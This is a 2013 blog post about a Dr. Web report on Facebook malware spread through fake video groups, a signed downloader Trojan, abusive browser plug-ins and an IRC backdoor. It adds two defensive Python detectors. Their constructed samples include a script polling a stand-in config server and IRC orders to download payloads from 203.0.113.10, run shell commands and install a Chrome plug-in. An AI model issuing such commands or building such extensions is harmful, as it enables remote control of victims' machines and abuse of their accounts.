Wednesday, February 6, 2013

A new wave of malware on Facebook

Dr. Web today warned of a new wave of malware spreading among users of the Facebook social network.

This time the attackers are abusing a Facebook-integrated application that lets anyone embed HTML code in a Facebook page. The Trojans are spread through fake themed groups that host a link to a malicious application disguised as a video.

To distribute the malware, the criminals created many themed Facebook groups named Videos Mega or Mega Videos: as of February 5, 2013 there were several hundred of them. In each group the criminals posted, disguised as a video, a link to an integrated social-networking application that allows HTML code to be embedded in any web page. A visitor who wants to watch the provocative video left-clicks the thumbnail and thereby triggers a script the criminals prepared in advance. The script displays a dialog box prompting the user to update the browser's built-in video player, and the window is styled to copy Facebook's own pages.

If the user agrees to install the "update", a self-extracting archive containing the malicious program Trojan.DownLoader8.5385 is run on the computer. The Trojan (and the additional components it downloads) carries a legitimate digital signature issued by Comodo in the name of a firm called Updates LTD, so Windows raises no untrusted-publisher warning while the malware is installed. A valid signature only proves that the signer held a certificate; it says nothing about whether that signer is trustworthy, so the publisher name, not just the validity status, has to be checked.

Trojan.DownLoader8.5385 is a conventional downloader Trojan whose main task is to fetch and run other malicious software on the infected computer. In this case it downloads plug-ins for Google Chrome and Mozilla Firefox designed to mass-mail invitations to various Facebook groups and to place Likes automatically.

Among other things, these malicious add-ons can:

- retrieve data on the Facebook users listed as the victim's friends;
- place a Like on a page in the social network or on an external link;
- gain access to photo albums on web pages;
- join groups;
- send the users on the friends list invitations to join a group;
- post links on users' walls;
- change the status;
- open a chat window;
- join an event page;
- send users invitations to events;
- post comments on posts;
- send and receive offers.

A configuration file containing all the data the plug-ins need is downloaded to the infected PC from a server belonging to the criminals. Dr.Web antivirus detects these plug-ins as Trojan.Facebook.310.
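The capabilities above amount to a browser extension that runs inside the victim's logged-in Facebook session and takes its orders from the criminals' server. The following added example, which is not code from Dr. Web or from the malware, shows how a responder can triage an unknown Chrome extension for exactly those traits: host access to facebook.com, session-level permissions, and hard-coded URLs in its background script that point somewhere other than the social network. The manifest, the background script and the 203.0.113.10 address are constructed for illustration.

```python
# Added example (not from Dr. Web's report or the malware): triage a Chrome
# extension for the traits the report attributes to Trojan.Facebook.310.
# The manifest, background script and 203.0.113.10 address are constructed.
import json
import re
from urllib.parse import urlparse

SOCIAL_HOST = "facebook.com"
# Permissions that let an extension act inside the user's logged-in session.
SESSION_PERMS = {"tabs", "cookies", "webRequest", "webRequestBlocking", "webNavigation"}
URL_RE = re.compile(r"""https?://[^\s'"]+""")
MATCH_RE = re.compile(r"^(\*|https?)://([^/]+)/")

# Constructed sample: a manifest and background script of the kind the report
# describes (not the real plug-in).
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Video Player Update",
    "version": "1.0",
    "permissions": ["tabs", "cookies", "webRequest",
                    "http://*.facebook.com/*", "https://*.facebook.com/*"],
    "content_scripts": [{"matches": ["*://*.facebook.com/*"], "js": ["fb.js"]}],
    "background": {"scripts": ["bg.js"]},
})
SAMPLE_BACKGROUND_JS = """
var cfg = 'http://203.0.113.10/cfg.php';   // constructed config server
function load() { var x = new XMLHttpRequest(); x.open('GET', cfg, true); x.send(); }
setInterval(load, 600000);
"""

def host_matches_social(pattern, host=SOCIAL_HOST):
    """True if a match pattern such as *://*.facebook.com/* covers the social site."""
    m = MATCH_RE.match(pattern)
    if not m:
        return False
    h = m.group(2)
    return h == "*" or h == host or h == "*." + host or h.endswith("." + host)

def external_urls(script, host=SOCIAL_HOST):
    """Hard-coded URLs in a script whose host is not the social network."""
    found = []
    for u in URL_RE.findall(script):
        h = urlparse(u).hostname or ""
        if h != host and not h.endswith("." + host):
            found.append(u)
    return found

def triage_extension(manifest_json, background_js=""):
    man = json.loads(manifest_json)
    perms = set(man.get("permissions", []))
    patterns = [p for p in perms if "://" in p]
    for cs in man.get("content_scripts", []):
        patterns.extend(cs.get("matches", []))
    targets_social = any(host_matches_social(p) for p in patterns)
    session_perms = sorted(perms & SESSION_PERMS)
    remote = external_urls(background_js)
    findings = []
    if targets_social:
        findings.append("has host access to " + SOCIAL_HOST)
    if session_perms:
        findings.append("session-level permissions: " + ", ".join(session_perms))
    if remote:
        findings.append("contacts external hosts: " + ", ".join(remote))
    # All three together is the profile of the plug-ins the report describes.
    return {"name": man.get("name"), "findings": findings,
            "suspicious": targets_social and bool(session_perms) and bool(remote)}

if __name__ == "__main__":
    result = triage_extension(SAMPLE_MANIFEST, SAMPLE_BACKGROUND_JS)
    print(result["name"], "->", "suspicious" if result["suspicious"] else "no flags")
    for f in result["findings"]:
        print(" -", f)
```

On a real machine the same function would be pointed at the manifest.json and background scripts under the browser's extension directory; an extension that scores on all three traits is worth pulling for analysis even when nothing else on the host looks wrong, because the extension itself is where the Facebook activity originates.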

In addition, Trojan.DownLoader8.5385 installs the malware BackDoor.IRC.Bot.2344, which can join infected workstations into a botnet. This Trojan implements a backdoor and can execute commands sent to it over the IRC (Internet Relay Chat) text-messaging protocol; to receive them, the bot connects to a chat channel the attackers created for this purpose.

The commands BackDoor.IRC.Bot.2344 can execute include:

- executing a command via the CMD shell;
- downloading a file from a specified URL and saving it to a specified local folder;
- checking whether the process named in the command is running;
- sending the remote server a list of running processes, obtained with the standard tasklist.exe utility;
- terminating a given process;
- launching any application;
- downloading a Google Chrome browser plug-in from a specified URL and installing it.
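The command set above is that of a standard IRC backdoor: the bot registers a nick, joins the attackers' channel and treats channel messages as instructions. The added example below, which is not code from Dr. Web or from the malware, replays a constructed client/server IRC exchange through a small parser and flags a session as bot-like when it joins a channel and then receives messages from the command categories the report lists (shell, download, process check/list/kill, run, Chrome plug-in install). The command keywords, the nick, the channel name and the 203.0.113.10 URLs are assumptions; the report does not give the bot's real syntax.

```python
# Added example (not from Dr. Web's report or the malware): replay a constructed
# IRC exchange and flag a session that joins a channel and then takes orders of
# the kinds the report lists for BackDoor.IRC.Bot.2344. The keywords below are
# assumed; the report does not give the bot's real command syntax.
import re

# Command categories from the report, keyed by assumed keywords.
COMMANDS = {
    "cmd": "shell",                  # execute a command via CMD
    "download": "download",          # fetch a file from a URL to a local folder
    "isrunning": "proc_check",       # check whether a named process is running
    "tasklist": "proc_list",         # send the tasklist.exe output
    "kill": "proc_kill",             # terminate a process
    "run": "exec",                   # launch an application
    "chromeplug": "plugin_install",  # fetch and install a Chrome plug-in
}

# Constructed capture: "C" = infected host to server, "S" = server to host.
# 203.0.113.10 is an RFC 5737 documentation address.
TRAFFIC = [
    ("C", "NICK [USA|XP]8314927"),
    ("C", "USER wxyz 0 * :wxyz"),
    ("S", ":irc.example.net 001 [USA|XP]8314927 :Welcome"),
    ("C", "JOIN #upd8 s3cr3t"),
    ("S", ":irc.example.net 366 [USA|XP]8314927 #upd8 :End of /NAMES list."),
    ("S", ":op!op@example.net PRIVMSG #upd8 :.tasklist"),
    ("C", "PRIVMSG #upd8 :explorer.exe 1204 chrome.exe 2312"),
    ("S", ":op!op@example.net PRIVMSG #upd8 :.download http://203.0.113.10/p.exe C:\\Users\\Public\\p.exe"),
    ("S", ":op!op@example.net PRIVMSG #upd8 :.cmd net user"),
    ("S", ":op!op@example.net PRIVMSG #upd8 :.chromeplug http://203.0.113.10/ext.crx"),
    ("S", "PING :irc.example.net"),
    ("C", "PONG :irc.example.net"),
]

# RFC 1459 line: [":" prefix SPACE] command [params] [" :" trailing]
IRC_RE = re.compile(r"^(?::(?P<prefix>\S+) )?(?P<cmd>\S+)(?: (?P<params>[^:]*?))?(?: :(?P<trail>.*))?$")
URL_RE = re.compile(r"https?://\S+")
# Many IRC bots build nicks from a country/OS tag plus a random number
# (a generic heuristic, not something the report states).
BOT_NICK_RE = re.compile(r"^\[[A-Z]{2,3}\|[^\]]+\]\d{4,}$")

def parse_irc(line):
    m = IRC_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return {"prefix": m.group("prefix"), "cmd": m.group("cmd").upper(),
            "params": (m.group("params") or "").split(), "trail": m.group("trail")}

def analyze(traffic):
    nick, channels, commands, urls = None, set(), [], set()
    for direction, line in traffic:
        msg = parse_irc(line)
        if msg is None:
            continue
        if direction == "C" and msg["cmd"] == "NICK" and msg["params"]:
            nick = msg["params"][0]
        elif direction == "C" and msg["cmd"] == "JOIN" and msg["params"]:
            channels.add(msg["params"][0])
        elif direction == "S" and msg["cmd"] == "PRIVMSG" and msg["trail"]:
            target = msg["params"][0] if msg["params"] else ""
            # Only messages aimed at the bot (its channel or its nick) count as orders.
            if target in channels or target == nick:
                tokens = msg["trail"].split()
                key = tokens[0].lstrip(".!").lower() if tokens else ""
                if key in COMMANDS:
                    commands.append((COMMANDS[key], tokens[1:]))
                    urls.update(URL_RE.findall(msg["trail"]))
    categories = sorted({c for c, _ in commands})
    # A shell command alone, or two distinct command categories, is enough to call it.
    bot_like = "shell" in categories or len(categories) >= 2
    return {"nick": nick, "nick_looks_generated": bool(nick and BOT_NICK_RE.match(nick)),
            "channels": sorted(channels), "categories": categories,
            "urls": sorted(urls), "bot_like": bot_like}

if __name__ == "__main__":
    r = analyze(TRAFFIC)
    print("bot-like:", r["bot_like"], "| nick:", r["nick"], "| channels:", r["channels"])
    print("command categories:", r["categories"])
    print("URLs to block:", r["urls"])
```

Fed the decoded IRC lines from a proxy or packet capture instead of the constructed list, the same logic yields the two things a responder needs first: the channel and nick pattern to hunt for on other hosts, and the URLs carried in download and plug-in commands, which are the payload sources to block.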

Thus one can conclude that Facebook's current security policy for embedded applications facilitates the spread of Trojans.
